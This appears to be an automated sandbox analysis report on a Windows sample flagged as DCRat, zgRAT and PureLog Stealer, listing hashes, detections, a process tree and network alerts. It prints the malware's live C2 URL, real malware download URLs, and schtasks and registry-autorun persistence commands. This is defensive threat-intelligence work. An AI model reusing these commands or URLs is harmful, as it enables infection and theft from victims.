Edit tour

Windows Analysis Report
KKjubdmzCR.exe

Overview

General Information

Sample name:	KKjubdmzCR.exe renamed because original name is a hash value
Original sample name:	75077730D0B0CC562F277D943F68E20A.exe
Analysis ID:	1555554
MD5:	75077730d0b0cc562f277d943f68e20a
SHA1:	0d78828e7392660d3f9250417b654f1d5e6ad04b
SHA256:	d967ebc2cbd50a46ac5b686fe92faeb77fea5a148cbb69fba6a2d92eaa1abc53
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ipconfig to lookup or modify the Windows network settings

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

KKjubdmzCR.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\KKjubdmzCR.exe" MD5: 75077730D0B0CC562F277D943F68E20A)

Bootstrapper.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\Bootstrapper.exe" MD5: 2A4DCF20B82896BE94EB538260C5FB93)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7564 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 7624 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

BootstrapperV1.23.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\BootstrapperV1.23.exe" --oldBootstrapper "C:\Users\user\Desktop\Bootstrapper.exe" --isUpdate true MD5: 02C70D9D6696950C198DB93B7F6A835E)

conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7840 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 7884 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

WerFault.exe (PID: 8188 cmdline: C:\Windows\system32\WerFault.exe -u -p 7772 -s 2200 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

Bootstrapper.exe (PID: 7492 cmdline: "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" MD5: 2DD40499F44DE86BB908734ECF206C6E)

wscript.exe (PID: 7636 cmdline: "C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\monitordll\bgx0Ow.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

componentreviewsavesSession.exe (PID: 1004 cmdline: "C:\monitordll/componentreviewsavesSession.exe" MD5: BE4E61EEC8A6CAB29C1AEDDD29D869EC)

schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 11 /tr "'C:\Recovery\wmnXYZRZEK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7580 cmdline: schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Recovery\wmnXYZRZEK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7572 cmdline: schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 12 /tr "'C:\Recovery\wmnXYZRZEK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 7616 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7392 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC1DD.tmp" "c:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 7384 cmdline: schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7608 cmdline: schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7728 cmdline: schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\wmnXYZRZEK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5828 cmdline: schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5756 cmdline: schtasks.exe /create /tn "SIHClient" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7788 cmdline: schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3848 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7888 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7864 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7476 cmdline: schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7684 cmdline: schtasks.exe /create /tn "wmnXYZRZEK" /sc ONLOGON /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7764 cmdline: schtasks.exe /create /tn "wmnXYZRZEKw" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7460 cmdline: schtasks.exe /create /tn "componentreviewsavesSessionc" /sc MINUTE /mo 14 /tr "'C:\monitordll\componentreviewsavesSession.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7744 cmdline: schtasks.exe /create /tn "componentreviewsavesSession" /sc ONLOGON /tr "'C:\monitordll\componentreviewsavesSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2896 cmdline: schtasks.exe /create /tn "componentreviewsavesSessionc" /sc MINUTE /mo 6 /tr "'C:\monitordll\componentreviewsavesSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3980 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4460 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

componentreviewsavesSession.exe (PID: 1148 cmdline: C:\monitordll\componentreviewsavesSession.exe MD5: BE4E61EEC8A6CAB29C1AEDDD29D869EC)

componentreviewsavesSession.exe (PID: 8008 cmdline: C:\monitordll\componentreviewsavesSession.exe MD5: BE4E61EEC8A6CAB29C1AEDDD29D869EC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://072486cm.n9shteam.ru/PhppollbigloadservermultiSqlBasetrackCdnUploads", "MUTEX": "DCR_MUTEX-pSeVGVkt0bF1Du5Q58H8", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
\Device\ConDrv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\monitordll\componentreviewsavesSession.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\monitordll\componentreviewsavesSession.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\monitordll\componentreviewsavesSession.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\monitordll\componentreviewsavesSession.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author
00000016.00000002.2137209000.0000000012401000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000016.00000000.2090696607.0000000000052000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1817989346.00000000071B3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1817467071.00000000071B4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1816251543.00000000068AD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: BootstrapperV1.23.exe PID: 7772	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: componentreviewsavesSession.exe PID: 1004	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
3.3.Bootstrapper.exe.72026e0.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.Bootstrapper.exe.72026e0.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KKjubdmzCR.exe.517e92.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.KKjubdmzCR.exe.517e92.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.Bootstrapper.exe.68fb6e0.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.Bootstrapper.exe.68fb6e0.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
22.0.componentreviewsavesSession.exe.50000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
22.0.componentreviewsavesSession.exe.50000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.Bootstrapper.exe.68fb6e0.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.Bootstrapper.exe.68fb6e0.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.Bootstrapper.exe.72026e0.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KKjubdmzCR.exe.4c97cb.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.KKjubdmzCR.exe.4c97cb.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KKjubdmzCR.exe.517e92.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.KKjubdmzCR.exe.517e92.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KKjubdmzCR.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.2.KKjubdmzCR.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\monitordll\componentreviewsavesSession.exe, ProcessId: 1004, TargetFilename: C:\Program Files (x86)\windows defender\en-GB\RuntimeBroker.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\wmnXYZRZEK.exe", EventID: 13, EventType: SetValue, Image: C:\monitordll\componentreviewsavesSession.exe, ProcessId: 1004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wmnXYZRZEK

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\wmnXYZRZEK.exe", EventID: 13, EventType: SetValue, Image: C:\monitordll\componentreviewsavesSession.exe, ProcessId: 1004, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\monitordll/componentreviewsavesSession.exe", ParentImage: C:\monitordll\componentreviewsavesSession.exe, ParentProcessId: 1004, ParentProcessName: componentreviewsavesSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline", ProcessId: 7616, ProcessName: csc.exe

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe", EventID: 13, EventType: SetValue, Image: C:\monitordll\componentreviewsavesSession.exe, ProcessId: 1004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SIHClient

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, ParentProcessId: 7492, ParentProcessName: Bootstrapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe" , ProcessId: 7636, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\monitordll\componentreviewsavesSession.exe, ProcessId: 1004, TargetFilename: C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Bootstrapper.exe" , ParentImage: C:\Users\user\Desktop\Bootstrapper.exe, ParentProcessId: 7428, ParentProcessName: Bootstrapper.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 7564, ProcessName: cmd.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\monitordll/componentreviewsavesSession.exe", ParentImage: C:\monitordll\componentreviewsavesSession.exe, ParentProcessId: 1004, ParentProcessName: componentreviewsavesSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline", ProcessId: 7616, ProcessName: csc.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /f, CommandLine: schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\monitordll/componentreviewsavesSession.exe", ParentImage: C:\monitordll\componentreviewsavesSession.exe, ParentProcessId: 1004, ParentProcessName: componentreviewsavesSession.exe, ProcessCommandLine: schtasks.exe /create /tn "SIHClientS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\SIHClient.exe'" /f, ProcessId: 5828, ProcessName: schtasks.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T04:52:52.734489+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49738	TCP
2024-11-14T04:53:31.460110+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49817	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T04:53:12.903458+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49751	104.21.77.97	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T04:52:40.328946+0100	2803305	3	Unknown Traffic	192.168.2.4	49732	104.21.93.27	443	TCP
2024-11-14T04:52:46.163537+0100	2803305	3	Unknown Traffic	192.168.2.4	49735	104.21.93.27	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: KKjubdmzCR.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://4d38a1ec.solaraweb-alj.pages.dev	Avira URL Cloud: Label: malware
Source: http://4d38a1ec.solaraweb-alj.pages.dev	Avira URL Cloud: Label: malware
Source: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	Avira URL Cloud: Label: malware
Source: https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Avira: detection malicious, Label: TR/AVI.Agent.iqkvn
Source: C:\monitordll\2mpoFrNBWk.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\monitordll\componentreviewsavesSession.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000016.00000002.2137209000.0000000012401000.00000004.00000800.00020000.00000000.sdmp

